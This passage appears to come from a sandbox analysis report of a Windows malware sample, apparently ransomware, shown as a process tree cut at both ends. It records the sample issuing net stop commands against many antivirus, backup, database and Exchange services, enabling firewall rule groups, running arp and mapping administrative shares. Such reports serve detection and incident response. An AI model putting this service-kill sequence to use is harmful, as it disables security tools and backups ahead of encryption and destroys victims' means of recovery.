  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop CAARCUpdateSvc /y
      4⤵
      PID:4504
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos AutoUpdate Service” /y
    3⤵
    PID:5240
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQLServerOLAPService /y
    3⤵
    PID:4272
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL57 /y
    3⤵
    PID:3368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL57 /y
      4⤵
      PID:4540
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
        5⤵
        
        PID:5660
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer /y
    3⤵
    PID:4500
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer /y
      4⤵
      PID:2152
- - C:\Windows\system32\net.exe
    "net.exe" stop MBEndpointAgent /y
    3⤵
    PID:4860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MBEndpointAgent /y
      4⤵
      PID:4924
- - C:\Windows\system32\net.exe
    "net.exe" stop sophos /y
    3⤵
    PID:4184
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sophos /y
      4⤵
      PID:5680
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Backup Service” /y
    3⤵
    PID:3828
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “SQLsafe Backup Service” /y
      4⤵
      PID:5724
- - C:\Windows\system32\net.exe
    "net.exe" stop McShield /y
    3⤵
    PID:1172
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McShield /y
      4⤵
      PID:4024
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:5284
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
      4⤵
      PID:5188
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer110 /y
    3⤵
    PID:5612
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MsDtsServer110 /y
      4⤵
      PID:5808
- - C:\Windows\system32\net.exe
    "net.exe" stop “Acronis VSS Provider” /y
    3⤵
    PID:5980
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Acronis VSS Provider” /y
      4⤵
      PID:4476
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamRESTSvc /y
    3⤵
    PID:5860
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamRESTSvc /y
      4⤵
      PID:5996
- - C:\Windows\system32\net.exe
    "net.exe" stop POP3Svc /y
    3⤵
    PID:4896
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop POP3Svc /y
      4⤵
      PID:1232
- - C:\Windows\system32\net.exe
    "net.exe" stop MsDtsServer /y
    3⤵
    PID:4968
- - C:\Windows\system32\net.exe
    "net.exe" stop mfefire /y
    3⤵
    PID:5312
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMGMT /y
    3⤵
    PID:5768
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeMGMT /y
      4⤵
      PID:5564
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop MSOLAP$SYSTEM_BGC /y
        5⤵
        
        PID:5008
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:4220
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:6004
- - C:\Windows\system32\net.exe
    "net.exe" stop MySQL80 /y
    3⤵
    PID:5620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MySQL80 /y
      4⤵
      PID:5600
- - C:\Windows\system32\net.exe
    "net.exe" stop IISAdmin /y
    3⤵
    PID:5928
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop IISAdmin /y
      4⤵
      PID:5696
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:5804
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:5416
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    PID:5208
- - C:\Windows\system32\net.exe
    "net.exe" stop mfemms /y
    3⤵
    PID:6000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfemms /y
      4⤵
      PID:5628
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Clean Service” /y
    3⤵
    PID:6016
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Clean Service” /y
      4⤵
      PID:4468
- - C:\Windows\system32\net.exe
    "net.exe" stop McTaskManager /y
    3⤵
    PID:2844
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop McTaskManager /y
      4⤵
      PID:5644
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeES /y
    3⤵
    PID:4464
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeES /y
      4⤵
      PID:3440
- - C:\Windows\system32\net.exe
    "net.exe" stop SMTPSvc /y
    3⤵
    PID:4992
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SMTPSvc /y
      4⤵
      PID:5888
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Agent” /y
    3⤵
    PID:4228
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Agent” /y
      4⤵
      PID:4988
- - C:\Windows\system32\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:5040
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop wbengine /y
      4⤵
      PID:5036
- - C:\Windows\system32\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:5316
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop VeeamTransportSvc /y
      4⤵
      PID:4812
- - C:\Windows\system32\net.exe
    "net.exe" stop RESvc /y
    3⤵
    PID:4472
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop RESvc /y
      4⤵
      PID:4624
    - - C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 stop SmcService /y
        5⤵
        
        PID:4844
- - C:\Windows\system32\net.exe
    "net.exe" stop OracleClientCache80 /y
    3⤵
    PID:4532
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop OracleClientCache80 /y
      4⤵
      PID:612
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:5048
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
      4⤵
      PID:5516
- - C:\Windows\system32\net.exe
    "net.exe" stop EraserSvc11710 /y
    3⤵
    PID:4592
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop EraserSvc11710 /y
      4⤵
      PID:4536
- - C:\Windows\system32\net.exe
    "net.exe" stop mfevtp /y
    3⤵
    PID:6132
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mfevtp /y
      4⤵
      PID:5192
- - C:\Windows\system32\net.exe
    "net.exe" stop msftesql$PROD /y
    3⤵
    PID:4356
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msftesql$PROD /y
      4⤵
      PID:4660
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:4540
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$BKUPEXEC /y
      4⤵
      PID:5804
- - C:\Windows\system32\net.exe
    "net.exe" stop SepMasterService /y
    3⤵
    PID:4376
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SepMasterService /y
      4⤵
      PID:5864
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPSAMA /y
    3⤵
    PID:4344
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ReportServer$TPSAMA /y
      4⤵
      PID:5832
- - C:\Windows\system32\net.exe
    "net.exe" stop sms_site_sql_backup /y
    3⤵
    PID:5648
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sms_site_sql_backup /y
      4⤵
      PID:5676
- - C:\Windows\system32\net.exe
    "net.exe" stop SstpSvc /y
    3⤵
    PID:5716
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SstpSvc /y
      4⤵
      PID:5748
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:3956
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
      4⤵
      PID:5384
- - C:\Windows\system32\net.exe
    "net.exe" stop “Zoolz 2 Service” /y
    3⤵
    PID:4712
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Zoolz 2 Service” /y
      4⤵
      PID:6068
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPS /y
    3⤵
    PID:5652
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPS /y
      4⤵
      PID:4612
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Device Control Service” /y
    3⤵
    PID:5468
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Device Control Service” /y
      4⤵
      PID:3716
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROD /y
    3⤵
    PID:6044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROD /y
      4⤵
      PID:5912
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SOPHOS /y
    3⤵
    PID:4556
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
      4⤵
      PID:5200
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$SYSTEM_BGC /y
    3⤵
    PID:2256
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeadtopology /y
    3⤵
    PID:5168
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeadtopology /y
      4⤵
      PID:4152
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:5228
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
      4⤵
      PID:5340
- - C:\Windows\system32\net.exe
    "net.exe" stop Smcinst /y
    3⤵
    PID:4388
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop Smcinst /y
      4⤵
      PID:4792
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos System Protection Service” /y
      4⤵
      PID:4468
- - C:\Windows\system32\net.exe
    "net.exe" stop “aphidmonitorservice” /y
    3⤵
    PID:2292
- - C:\Windows\system32\net.exe
    "net.exe" stop “Symantec System Recovery” /y
    3⤵
    PID:4880
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Symantec System Recovery” /y
      4⤵
      PID:2140
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Agent” /y
    3⤵
    PID:588
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Agent” /y
      4⤵
      PID:3484
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"Network Discovery\" new enable=Yes
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2112
- - C:\Windows\system32\net.exe
    "net.exe" stop sacsvr /y
    3⤵
    PID:4544
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sacsvr /y
      4⤵
      PID:5116
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:4312
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
      4⤵
      PID:4400
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SQL_2008 /y
    3⤵
    PID:4988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$SQL_2008 /y
      4⤵
      PID:4196
- - C:\Windows\system32\net.exe
    "net.exe" stop ShMonitor /y
    3⤵
    PID:5844
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$CXDB /y
    3⤵
    PID:5972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$CXDB /y
      4⤵
      PID:4924
- - C:\Windows\system32\net.exe
    "net.exe" stop UI0Detect /y
    3⤵
    PID:4796
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop UI0Detect /y
      4⤵
      PID:4536
- - C:\Windows\system32\net.exe
    "net.exe" stop SmcService /y
    3⤵
    PID:4624
- - C:\Windows\system32\net.exe
    "net.exe" stop AcrSch2Svc /y
    3⤵
    PID:4360
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSA /y
    3⤵
    PID:5680
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSA /y
      4⤵
      PID:4368
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /
      4⤵
      PID:5328
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVAdminService /y
    3⤵
    PID:5660
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVAdminService /y
      4⤵
      PID:5940
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:4512
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
      4⤵
      PID:6076
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$TPSAMA /y
    3⤵
    PID:4244
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSOLAP$TPSAMA /y
      4⤵
      PID:4836
- - C:\Windows\system32\net.exe
    "net.exe" stop SntpService /y
    3⤵
    PID:4272
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SntpService /y
      4⤵
      PID:5384
- - C:\Windows\system32\net.exe
    "net.exe" stop “intel(r) proset monitoring service” /y
    3⤵
    PID:5832
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “intel(r) proset monitoring service” /y
      4⤵
      PID:4780
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos File Scanner Service” /y
    3⤵
    PID:4892
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos File Scanner Service” /y
      4⤵
      PID:1172
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$ECWDB2 /y
    3⤵
    PID:4656
- - C:\Windows\system32\net.exe
    "net.exe" stop SAVService /y
    3⤵
    PID:5856
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SAVService /y
      4⤵
      PID:4608
- - C:\Windows\system32\net.exe
    "net.exe" stop msexchangeimap4 /y
    3⤵
    PID:4948
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop msexchangeimap4 /y
      4⤵
      PID:4824
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:4804
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
      4⤵
      PID:5176
- - C:\Windows\system32\net.exe
    "net.exe" stop “Veeam Backup Catalog Data Service” /y
    3⤵
    PID:5992
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Veeam Backup Catalog Data Service” /y
      4⤵
      PID:6064
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos MCS Client” /y
    3⤵
    PID:2836
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos MCS Client” /y
      4⤵
      PID:5984
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:1228
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
      4⤵
      PID:5500
- - C:\Windows\system32\net.exe
    "net.exe" stop sophossps /y
    3⤵
    PID:5000
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop sophossps /y
      4⤵
      PID:4640
- - C:\Windows\system32\net.exe
    "net.exe" stop ARSM /y
    3⤵
    PID:1332
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop ARSM /y
      4⤵
      PID:5704
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_filter /y
    3⤵
    PID:5148
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_filter /y
      4⤵
      PID:5716
- - C:\Windows\system32\net.exe
    "net.exe" stop MSOLAP$SYSTEM_BGC /y
    3⤵
    PID:5564
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQL_2008 /y
    3⤵
    PID:6112
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
      4⤵
      PID:4472
- - C:\Windows\system32\net.exe
    "net.exe" stop W3Svc /y
    3⤵
    PID:6048
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop W3Svc /y
      4⤵
      PID:6132
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SOPHOS /y
    3⤵
    PID:2292
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
      4⤵
      PID:3440
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPS /y
    3⤵
    PID:5040
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPS /y
      4⤵
      PID:6040
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$BKUPEXEC /y
    3⤵
    PID:4540
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeSRS /y
    3⤵
    PID:1176
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSExchangeSRS /y
      4⤵
      PID:4868
- - C:\Windows\system32\net.exe
    "net.exe" stop unistoresvc_1af40a /y
    3⤵
    PID:4560
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop unistoresvc_1af40a /y
      4⤵
      PID:4596
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:5888
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
      4⤵
      PID:4988
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop QBCFMonitorService /y
      4⤵
      PID:5676
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_service /y
    3⤵
    PID:4412
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_service /y
      4⤵
      PID:4648
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$TPSAMA /y
    3⤵
    PID:3964
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
      4⤵
      PID:612
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Message Router” /y
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:4120
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Message Router” /y
      4⤵
      PID:5388
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Health Service” /y
    3⤵
    PID:6032
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$ECWDB2 /y
    3⤵
    PID:4952
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$ECWDB2 /y
      4⤵
      PID:5616
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentAccelerator /y
    3⤵
    PID:5248
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentAccelerator /y
      4⤵
      PID:5724
- - C:\Windows\system32\net.exe
    "net.exe" stop svcGenericHost /y
    3⤵
    PID:1144
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop svcGenericHost /y
      4⤵
      PID:4148
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update /y
    3⤵
    PID:1972
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update /y
      4⤵
      PID:1172
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY /y
    3⤵
    PID:5776
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY /y
      4⤵
      PID:4488
- - C:\Windows\system32\net.exe
    "net.exe" stop audioendpointbuilder /y
    3⤵
    PID:4800
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop audioendpointbuilder /y
      4⤵
      PID:5908
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /
    3⤵
    PID:5680
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SBSMONITORING /y
    3⤵
    PID:4204
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SBSMONITORING /y
      4⤵
      PID:5868
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:280
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
      4⤵
      PID:5324
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyServiceHelper /y
    3⤵
    PID:5400
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
      4⤵
      PID:5540
- - C:\Windows\system32\net.exe
    "net.exe" stop ReportServer$TPS /y
    3⤵
    PID:4128
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:5240
- - C:\Windows\system32\net.exe
    "net.exe" stop AVP /y
    3⤵
    PID:4620
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop AVP /y
      4⤵
      PID:2204
- - C:\Windows\system32\net.exe
    "net.exe" stop swi_update_64 /y
    3⤵
    PID:2484
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop swi_update_64 /y
      4⤵
      PID:2856
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecVSSProvider /y
    3⤵
    PID:5984
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecVSSProvider /y
      4⤵
      PID:6120
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLTELEMETRY$ECWDB2 /y
    3⤵
    PID:2312
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y
      4⤵
      PID:2268
- - C:\Windows\system32\net.exe
    "net.exe" stop WRSVC /y
    3⤵
    PID:5720
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop WRSVC /y
      4⤵
      PID:252
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:5556
- - C:\Windows\system32\net.exe
    "net.exe" stop MSExchangeMTA /y
    3⤵
    PID:5296
- - C:\Windows\system32\net.exe
    "net.exe" stop “SQLsafe Filter Service” /y
    3⤵
    PID:4912
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:4704
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
      4⤵
      PID:5560
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$SHAREPOINT /y
    3⤵
    PID:2256
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$SHAREPOINT /y
      4⤵
      PID:4136
- - C:\Windows\system32\net.exe
    "net.exe" stop mssql$vim_sqlexp /y
    3⤵
    PID:4424
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop mssql$vim_sqlexp /y
      4⤵
      PID:4472
- - C:\Windows\system32\net.exe
    "net.exe" stop QBCFMonitorService /y
    3⤵
    PID:5888
- - C:\Windows\system32\net.exe
    "net.exe" stop TmCCSF /y
    3⤵
    PID:4108
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TmCCSF /y
      4⤵
      PID:5556
- - C:\Windows\system32\net.exe
    "net.exe" stop vapiendpoint /y
    3⤵
    PID:6132
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop vapiendpoint /y
      4⤵
      PID:5844
- - C:\Windows\system32\net.exe
    "net.exe" stop DCAgent /y
    3⤵
    PID:5344
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLBrowser /y
    3⤵
    PID:5928
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLBrowser /y
      4⤵
      PID:4792
- - C:\Windows\system32\net.exe
    "net.exe" stop tmlisten /y
    3⤵
    PID:5140
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop tmlisten /y
      4⤵
      PID:3484
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSafeOLRService /y
    3⤵
    PID:4444
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSafeOLRService /y
      4⤵
      PID:4812
- - C:\Windows\system32\netsh.exe
    "netsh" advfirewall firewall set rule group=\"File and Printer Sharing\" new enable=Yes
    3⤵
    PID:4880
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKey /y
    3⤵
    PID:5032
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop TrueKey /y
      4⤵
      PID:4536
- - C:\Windows\system32\net.exe
    "net.exe" stop SQLSERVERAGENT /y
    3⤵
    PID:4700
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop SQLSERVERAGENT /y
      4⤵
      PID:5624
- - C:\Windows\system32\arp.exe
    "arp" -a
    3⤵
    PID:5116
- - C:\Windows\system32\net.exe
    "net.exe" stop TrueKeyScheduler /y
    3⤵
    PID:6108
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Users
    3⤵
    PID:4764
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\A$
    3⤵
    PID:5088
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\B$
    3⤵
    PID:5280
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\C$
    3⤵
    PID:5636
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\D$
    3⤵
    PID:4524
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\E$
    3⤵
    PID:4244
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\F$
    3⤵
    PID:4944
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\G$
    3⤵
    PID:5708
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\H$
    3⤵
    PID:1752
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\I$
    3⤵
    PID:4876
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\J$
    3⤵
    PID:4116
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\K$
    3⤵
    PID:2220
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\L$
    3⤵
    PID:5764
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\M$
    3⤵
    PID:5888
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\N$
    3⤵
    PID:4204
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\O$
    3⤵
    PID:6032
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\P$
    3⤵
    PID:4560
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Q$
    3⤵
    PID:4384
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\R$
    3⤵
    PID:5300
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\S$
    3⤵
    PID:2268
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\T$
    3⤵
    PID:6064
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\U$
    3⤵
    PID:3372
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\V$
    3⤵
    PID:4732
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos Safestore Service” /y
    3⤵
    PID:6120
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop “Sophos Safestore Service” /y
      4⤵
      PID:4616
- - C:\Windows\system32\net.exe
    "net.exe" stop BackupExecAgentBrowser /y
    3⤵
    PID:4544
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop BackupExecAgentBrowser /y
      4⤵
      PID:4464
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\W$
    3⤵
    PID:2312
- - C:\Windows\system32\net.exe
    "net.exe" stop MSSQL$PRACTICEMGT /y
    3⤵
    PID:6044
  - - C:\Windows\system32\net1.exe
      C:\Windows\system32\net1 stop MSSQL$PRACTICEMGT /y
      4⤵
      PID:4712
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\X$
    3⤵
    PID:4472
- - C:\Windows\system32\net.exe
    "net.exe" use \\127.0.0.1\Y$
    3⤵
    PID:5168
- - C:\Windows\system32\net.exe
    "net.exe" stop “Sophos System Protection Service” /y
    3⤵
